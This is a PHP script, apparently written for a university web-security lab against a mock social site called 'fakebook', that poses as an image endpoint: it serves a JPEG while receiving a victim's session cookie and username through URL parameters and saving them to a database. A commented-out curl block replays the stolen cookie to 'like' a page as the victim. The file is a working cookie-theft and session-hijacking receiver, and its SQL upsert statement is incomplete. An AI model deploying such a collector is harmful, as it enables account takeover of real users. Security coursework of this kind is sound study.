<?php

//-----------------------------------------------------------------------------
// Show image (source of the image: https://pixabay.com/photos/ring-lord-of-the-rings-hobbit-4612457/)
// source: https://code-boxx.com/display-image-file-php/
// (A) GET IMAGE INFO
$file = "ring_very_small.jpg";
$fileData = exif_read_data($file);
 
// (B) READ & OUTPUT IMAGE
ob_start();
header("Content-Type: " . $fileData["MimeType"]);
header("Content-Length: " . $fileData["FileSize"]);
readfile($file);
ob_end_flush();


// Save variables - user_id, username, cookie
$username = $_GET['u'];
$cookie = $_GET['c'];
$id = substr($cookie, strpos($cookie, "user_id=") + 8);
$id = explode(";", $id)[0];

//-----------------------------------------------------------------------------
// Save cookie in DB
// Source1: https://courses.fit.cvut.cz/BI-BEK/media/lectures/bek09cz.pdf
// Source2: https://www.w3schools.com/php/php_mysql_prepared_statements.asp
// Credentials to the DB
$servername = "**********";
$DBusername = "**********";
$password = "**********";
$dbname = "**********";

// error/exception handler 
function myErrorHandler($errno, $errstr, $errfile, $errline)
{
    error_log("$errno: $errstr in $errfile:$errline", 2, "/error.log");
    header('HTTP/1.1 500 Internal Server Error', TRUE, 500);
    exit;
}

// catch errors from MySQLi
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
set_error_handler("myErrorHandler");
set_exception_handler("myErrorHandler");

// check if $id is a number
if(! is_numeric(($id)))
{
  exit;
}

// Create connection
$conn = new mysqli($servername, $DBusername, $password, $dbname);
// Check connection
if ($conn->connect_error) {
  die("Connection failed: " . $conn->connect_error);
}

// escape strings before inserting
$cookie = $conn->real_escape_string($cookie);
$username = $conn->real_escape_string($username);

$stmt = $conn->stmt_init();

// upsert cookie
if($stmt->prepare("INSERT INTO cookies (id, username, cookie) VALUES (?, ?, ?) ON DUPLICATE KEY UPDATE")) {
  $stmt->bind_param('iss', $id,  $username, $cookie);
  $stmt->execute();
  $stmt->close();
}
$conn->close();

//-----------------------------------------------------------------------------
// Add to our group of friends
// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
//$ch = curl_init();
//
//curl_setopt($ch, CURLOPT_URL, 'http://boura.fit.cvut.cz/fakebook/static/ajax.php');
//curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
//curl_setopt($ch, CURLOPT_POST, 1);
//curl_setopt($ch, CURLOPT_POSTFIELDS, "&core[ajax]=true&core[call]=like.add&type_id=pages&item_id=11&core[security_token]=b6ca8fa843bb30706a4d3207609147da&core[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]=0");
//
//$headers = array();
//$headers[] = 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0';
//$headers[] = 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01';
//$headers[] = 'Accept-Language: en-US,en;q=0.5';
//$headers[] = 'Accept-Encoding: gzip, deflate';
//$headers[] = 'Content-Type: application/x-www-form-urlencoded';
//$headers[] = 'X-Requested-With: XMLHttpRequest';
//$headers[] = 'Origin: http://boura.fit.cvut.cz';
//$headers[] = 'Connection: keep-alive';
//$headers[] = 'Referer: http://boura.fit.cvut.cz/fakebook/index.php?do=/pages/11/';
//$headers[] = 'Cookie: ' . $cookie;
//curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
//
//$result = curl_exec($ch);
//
//curl_close($ch);
//-----------------------------------------------------------------------------
?>